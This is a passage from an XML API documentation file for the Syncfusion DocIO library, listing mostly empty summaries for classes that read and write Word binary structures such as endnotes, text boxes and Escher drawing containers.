        <member name="P:Syncfusion.DocIO.ReaderWriter.FootnotesRW.InitialDescriptorNumber">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.EndnotesRW.#ctor">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.EndnotesRW.#ctor(System.IO.Stream,Syncfusion.DocIO.ReaderWriter.Fib)">
            <summary>
            
            </summary>
            <param name="stream"></param>
            <param name="fib"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.EndnotesRW.WriteTxtPositions">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.EndnotesRW.WriteDescriptors">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.EndnotesRW.ReadTxtPositions">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.EndnotesRW.ReadDescriptors">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.EndnotesRW.ReadDescriptor(System.IO.BinaryReader,System.Int32,System.Int32)">
            <summary>
            
            </summary>
            <param name="reader"></param>
            <param name="pos"></param>
            <param name="posNext"></param>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.ArtObjectsRW">
            <summary>
            Summary description for Shapes.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.ArtObjectsRW.m_stream">
            <summary>
            Table stream
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.ArtObjectsRW.m_fspas">
            <summary>
            Sorted list with FileShapeAddress structures
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.ArtObjectsRW.m_txbxs">
            <summary>
            Sorted list with TexBoxStory structures
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.ArtObjectsRW.m_txbxBkds">
            <summary>
            Sorted list with textbox BreakDescriptors
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.ArtObjectsRW.m_txBxMainEndPos">
            <summary>
            Last text position for textbox in Main
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.ArtObjectsRW.m_txBxHeaderEndPos">
            <summary>
            Last text position for textbox in Header
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.ArtObjectsRW.#ctor(Syncfusion.DocIO.ReaderWriter.Fib,System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="fib"></param>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.ArtObjectsRW.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.ArtObjectsRW"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.ArtObjectsRW.AddFSPA(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FileShapeAddress,Syncfusion.DocIO.ReaderWriter.WordSubdocument,System.Int32)">
            <summary>
            
            </summary>
            <param name="fspa"></param>
            <param name="docType"></param>
            <param name="pos"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.ArtObjectsRW.AddTxbx(Syncfusion.DocIO.ReaderWriter.WordSubdocument,Syncfusion.DocIO.ReaderWriter.Biff_Records.TextBoxStoryDescriptor,Syncfusion.DocIO.ReaderWriter.Biff_Records.BreakDescriptor,System.Int32)">
            <summary>
            Initialize MainDocTxBxs and MainDocTxBxBKDs, or HfDocTxBxBKDs and HfDocTxBxs
            </summary>
            <param name="docType"></param>
            <param name="txbxStoryDesc"></param>
            <param name="txbxBKDesc"></param>
            <param name="pos"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.ArtObjectsRW.Read(System.IO.Stream,Syncfusion.DocIO.ReaderWriter.Fib)">
            <summary>
            
            </summary>
            <param name="fib"></param>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.ArtObjectsRW.Write(System.IO.Stream,Syncfusion.DocIO.ReaderWriter.Fib,System.Int32,System.Int32)">
            <summary>
            
            </summary>
            <param name="stream"></param>
            <param name="fib"></param>
            <param name="endMain"></param>
            <param name="endHeader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.ArtObjectsRW.GetTxbxPosition(System.Boolean,System.Int32)">
            <summary>
            Get textbox text positions (needed in Reader)
            </summary>
            <param name="isHdrTxbx"></param>
            <param name="index"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.ArtObjectsRW.GetShapeObjectId(Syncfusion.DocIO.ReaderWriter.WordSubdocument,System.Int32)">
            <summary>
            Get ShapeObject's identificator from TextboxStoryDescriptor collection.  
            </summary>
            <param name="subDocType">Subdocument type.</param>
            <param name="txbxIndex">ShapeObject entry.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.ArtObjectsRW.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.ArtObjectsRW.FindFileShape(Syncfusion.DocIO.ReaderWriter.WordSubdocument,System.Int32)">
            <summary>
            
            </summary>
            <param name="docType"></param>
            <param name="CP"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.ArtObjectsRW.ReadShapeFSPA(Syncfusion.DocIO.ReaderWriter.WordSubdocument,System.Int32,System.Int32)">
            <summary>
            
            </summary>
            <param name="docType"></param>
            <param name="pos"></param>
            <param name="length"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.ArtObjectsRW.ReadTxbx(Syncfusion.DocIO.ReaderWriter.WordSubdocument,System.Int32,System.Int32)">
            <summary>
            Read TextBoxes
            </summary>
            <param name="docType"></param>
            <param name="pos">table stream position</param>
            <param name="length"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.ArtObjectsRW.ReadTxbxBkd(Syncfusion.DocIO.ReaderWriter.WordSubdocument,System.Int32,System.Int32)">
            <summary>
            Read TextBox breakdescriptors
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.ArtObjectsRW.GetPositions(System.Int32,System.Int32)">
            <summary>
            Get positions for each type of artobjects
            </summary>
            <param name="structSize"> structure type </param>
            <param name="length"> structure length </param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.ArtObjectsRW.WriteFSPAs(Syncfusion.DocIO.ReaderWriter.Fib,System.Int32,System.Int32)">
            <summary>
            Write FSPA
            </summary>
            <param name="fib"></param>
            <param name="endMain"></param>
            <param name="endHeader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.ArtObjectsRW.WriteTxBxs(Syncfusion.DocIO.ReaderWriter.Fib,System.Int32)">
            <summary>
            Write textbox
            </summary>
            <param name="fib">fib data</param>
            <param name="endCharacter"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.ArtObjectsRW.WriteTxBxBKDs(Syncfusion.DocIO.ReaderWriter.Fib)">
            <summary>
            Write break descriptors
            </summary>
            <param name="fib"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.ArtObjectsRW.WriteArtObjectsTxBxBKDs(Syncfusion.DocIO.DLS.DocIOSortedList{System.Int32,Syncfusion.DocIO.ReaderWriter.Biff_Records.BreakDescriptor},System.Int32)">
            <summary>
            Write data to stream
            </summary>
            <param name="stList"></param>
            <param name="endPos">End position for FSPA </param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.ArtObjectsRW.WriteArtObjectsTxBxs(Syncfusion.DocIO.DLS.DocIOSortedList{System.Int32,Syncfusion.DocIO.ReaderWriter.Biff_Records.TextBoxStoryDescriptor},System.Int32)">
            <summary>
            Write data to stream
            </summary>
            <param name="stList"></param>
            <param name="endPos">End position for FSPA </param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.ArtObjectsRW.GetByIndex(Syncfusion.DocIO.DLS.DocIOSortedList{System.Int32,Syncfusion.DocIO.ReaderWriter.Biff_Records.TextBoxStoryDescriptor},System.Int32)">
            <summary>
            Gets the index of the by.
            </summary>
            <param name="col">The col.</param>
            <param name="index">The index.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.ArtObjectsRW.GetKey(Syncfusion.DocIO.DLS.DocIOSortedList{System.Int32,Syncfusion.DocIO.ReaderWriter.Biff_Records.TextBoxStoryDescriptor},System.Int32)">
            <summary>
            Gets the key.
            </summary>
            <param name="col">The col.</param>
            <param name="index">The index.</param>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.ArtObjectsRW.MainDocFSPAs">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.ArtObjectsRW.MainDocTxBxs">
            <summary>
            Sorted list of  textboxes
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.ArtObjectsRW.MainDocTxBxBKDs">
            <summary>
            Sorted list of textbox descriptors
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.ArtObjectsRW.HfDocFSPAs">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.ArtObjectsRW.HfDocTxBxs">
            <summary>
            Sorted list of header/footer's textboxes
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.ArtObjectsRW.HfDocTxBxBKDs">
            <summary>
            Sorted list of header/footer's textboxe descriptors
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.ArtObjectsRW.StructsCount">
            <summary>
            Get count of the structures
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.BaseContainer">
            <summary>
            Base class for all Container classes
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.BaseEscherRecord">
            <summary>
            Summary description for BaseContainer.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.BaseEscherRecord.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.BaseEscherRecord.#ctor(Syncfusion.DocIO.ReaderWriter.Escher.MSOFBT,System.Int32,Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            
            </summary>
            <param name="type"></param>
            <param name="version"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.BaseEscherRecord.ReadRecordData(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.BaseEscherRecord.WriteRecordData(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.BaseEscherRecord.Clone">
            <summary>
            Clone current record.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.BaseEscherRecord.ReadRecord(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher._MSOFBH,System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="msofbh"></param>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.BaseEscherRecord.ReadMsofbhWithRecord(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.BaseEscherRecord.WriteMsofbhWithRecord(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.BaseEscherRecord.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.BaseEscherRecord.Header">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.BaseContainer.m_childrenContainers">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.BaseContainer.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.BaseContainer.#ctor(Syncfusion.DocIO.ReaderWriter.Escher.MSOFBT,Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            
            </summary>
            <param name="type"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.BaseContainer.RemoveContainerBySpid(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.BaseContainer,System.Int32)">
            <summary>
            Removes the container by spid.
            </summary>
            <param name="baseContainer">The base container.</param>
            <param name="spid">The spid.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.BaseContainer.SynchronizeIdent(Syncfusion.DocIO.DLS.WTextBoxCollection,System.Int32@,System.Int32@,System.Int32@,System.Int32@)">
            <summary>
            Synchronize identificators in escher container.
            </summary>
            <param name="autoShapeCollection">The auto shape collection.</param>
            <param name="txbxShapeId">The textbox shape id.</param>
            <param name="pictShapeId">The pict shape id.</param>
            <param name="txId">The text id.</param>
            <param name="textColIndex">Index of the text col.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.BaseContainer.GetSpid">
            <summary>
            Gets shape container's identificator.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.BaseContainer.SetSpid(System.Int32)">
            <summary>
            
            </summary>
            <param name="spid"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.BaseContainer.FindContainerByMsofbt(Syncfusion.DocIO.ReaderWriter.Escher.MSOFBT)">
            <summary>
            
            </summary>
            <param name="msofbt"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.BaseContainer.FindContainerByType(System.Type)">
            <summary>
            
            </summary>
            <param name="type"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.BaseContainer.FindParentContainer(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.BaseContainer)">
            <summary>
            
            </summary>
            <param name="baseContainer"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.BaseContainer.ReadRecordData(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.BaseContainer.WriteRecordData(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.BaseContainer.Clone">
            <summary>
            
            </summary>
            <returns></returns>    
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.BaseContainer.CloneRelationsTo(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Clones the relations to.
            </summary>
            <param name="doc">The doc.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.BaseContainer.RemoveBaseContainerOle">
            <summary>
            Remove Ole from BaseContainer.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.BaseContainer.SyncOPTTxid(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtOPT,System.Int32@)">
            <summary>
            Syncronize Txid in OPT container.
            </summary>
            <param name="optRecord">The option record.</param>
            <param name="txId">The text id.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.BaseContainer.SyncSpRecord(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSp,Syncfusion.DocIO.DLS.WTextBoxCollection,System.Int32@,System.Int32@,System.Int32@)">
            <summary>
            Synchronize MsofbtSp.
            </summary>
            <param name="msofbtSp">The shape record.</param>
            <param name="autoShapeCollection">The auto shape collection.</param>
            <param name="txbxShapeId">The textbox shape id.</param>
            <param name="pictShapeId">The pict shape id.</param>
            <param name="textColIndex">Index in the text collection.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.BaseContainer.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.BaseContainer.Children">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.ContainerCollection">
            <summary>
            Summary description for ContainerCollection.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.ContainerCollection.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.ContainerCollection.Write(System.IO.Stream)">
            <summary>
            Writes the specified stream.
            </summary>
            <param name="stream">The stream.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.ContainerCollection.Read(System.IO.Stream,System.Int32)">
            <summary>
            Reads the specified stream.
            </summary>
            <param name="stream">The stream.</param>
            <param name="length">The length.</param>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherClass">
            <summary>
            Summary description for Escher.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherClass.DEF_MAIN_DRAWING_ID">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherClass.m_msofbtDggContainer">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherClass.m_dgContainers">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherClass.m_containers">
            <summary>
            Collection which is used for fast container's search.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherClass.m_backgroundContainer">
            <summary>
            Background container.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherClass.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherClass.#ctor(System.IO.Stream,System.IO.Stream,System.Int64,System.Int64,Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherClass"/> class.
            </summary>
            <param name="tableStream">The table stream.</param>
            <param name="docStream">The doc stream.</param>
            <param name="dggInfoOffset">The DGG info offset.</param>
            <param name="dggInfoLength">Length of the DGG info.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherClass.Read(System.IO.Stream,System.Int64,System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="tableStream"></param>
            <param name="dggInfoLength"></param>
            <param name="docStream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherClass.ReadContainersData(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="Stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherClass.WriteContainersData(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherClass.WriteContainers(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherClass.AddContainerForSubDocument(Syncfusion.DocIO.ReaderWriter.WordSubdocument,Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.BaseEscherRecord)">
            <summary>
            
            </summary>
            <param name="documentType"></param>
            <param name="baseEscherRecord"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherClass.FindDgContainerForSubDocType(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.ShapeDocType)">
            <summary>
            
            </summary>
            <param name="ShapeDocType"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherClass.InitShapeSpids">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherClass.RemoveHeaderContainer">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherClass.FindParentContainer(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.BaseContainer)">
            <summary>
            
            </summary>
            <param name="baseContainer"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherClass.GetTxid(System.Int32)">
            <summary>
            
            </summary>
            <param name="spid"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherClass.GetShapeOrderIndex(System.Int32)">
            <summary>
            Get shape order index
            </summary>
            <param name="spId"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherClass.SetTxid(System.Int32,System.Int32)">
            <summary>
            
            </summary>
            <param name="spid"></param>
            <param name="txid"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherClass.FindContainerBySpid(System.Int32)">
            <summary>
            
            </summary>
            <param name="spid"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherClass.FindInDgContainers(System.Int32)">
            <summary>
            
            </summary>
            <param name="spid"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherClass.GetBaseEscherRecordType(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer)">
            <summary>
            Get shape type of BaseEscherRecord
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherClass.CloneContainerBySpid(Syncfusion.DocIO.DLS.WordDocument,Syncfusion.DocIO.ReaderWriter.WordSubdocument,System.Int32,System.Int32)">
            <summary>
            Clone container in escher.
            </summary>
            <param name="destDoc">Destination document</param>
            <param name="docType">Wordsubdocument( main or header/footer)</param>
            <param name="spid">Spid of container, which will be cloned</param>
            <param name="newSpid">Result container spid</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherClass.RemoveEscherOle">
            <summary>
            Remove OLE from escher.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherClass.RemoveContainerBySpid(System.Int32,System.Boolean)">
            <summary>
            
            </summary>
            <param name="spid"></param>
            <param name="isHeaderContainer"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherClass.RemoveBStoreByPid(System.Int32)">
            <summary>
            Remove container with data from BStoreContainer by PID.
            </summary>
            <param name="pib"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherClass.ModifyBStoreByPid(System.Int32,Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtBSE)">
            <summary>
            Remove container with data from BStoreContainer by PID.
            </summary>
            <param name="pib"></param>
            <param name="bse"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherClass.GetBackgroundContainer">
            <summary>
            Get background container. 
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherClass.CheckBStoreContByPid(System.Int32)">
            <summary>
            Checks the existance of container with such pib and checks if Blip != null
            </summary>
            <param name="pib">The pib.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherClass.ReadBseData(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.BaseContainer,System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="baseContainer"></param>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherClass.InitWriting">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherClass.WriteDggContainer(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherClass.WriteDgContainers(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherClass.CreateDgForSubDocuments">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherClass.CreateDefaultDgg">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherClass.CreateDgForSubDocument(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.ShapeDocType,System.Int32,System.Int32)">
            <summary>
            
            </summary>
            <param name="shapeDocType"></param>
            <param name="drawingId"></param>
            <param name="shapeId"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherClass.FindContainerAmongChildren(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.BaseContainer,System.Int32)">
            <summary>
            
            </summary>
            <param name="parentContainer"></param>
            <param name="spid"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherClass.AddShapeBse(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer)">
            <summary>
            
            </summary>
            <param name="spContainer"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherClass.ConvertToShapeDocType(Syncfusion.DocIO.ReaderWriter.WordSubdocument)">
            <summary>
            
            </summary>
            <param name="docType"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherClass.AddParentContainer(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.BaseContainer)">
            <summary>
            
            </summary>
            <param name="baseContainer"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherClass.CreateGeneralData">
            <summary>
            Create and fill MsofbtGeneral (textboxes only)
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherClass.InitFidcl(System.Int32,System.Int32)">
            <summary>
            Initialize FIDCL for textboxes
            </summary>
            <param name="dgid"></param>
            <param name="cspidCur"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherClass.FindFIDCLDgid(System.Int32,Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.FIDCL)">
            <summary>
            
            </summary>
            <param name="dgid"></param>
            <param name="fidclObj"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherClass.GetShapeCount(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.BaseContainer)">
            <summary>
            Get the number of shaped in DgContainer.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherClass.GetBlipId(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer)">
             <summary>
            
             </summary>
             <param name="spContainer"></param>
             <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherClass.FillCollectionForSearch">
            <summary>
            Fill m_containers hash table
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.EscherClass.FillCollectionForSearch(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.BaseContainer)">
            <summary>
            
            </summary>
            <param name="baseContainer"></param>
        </member>
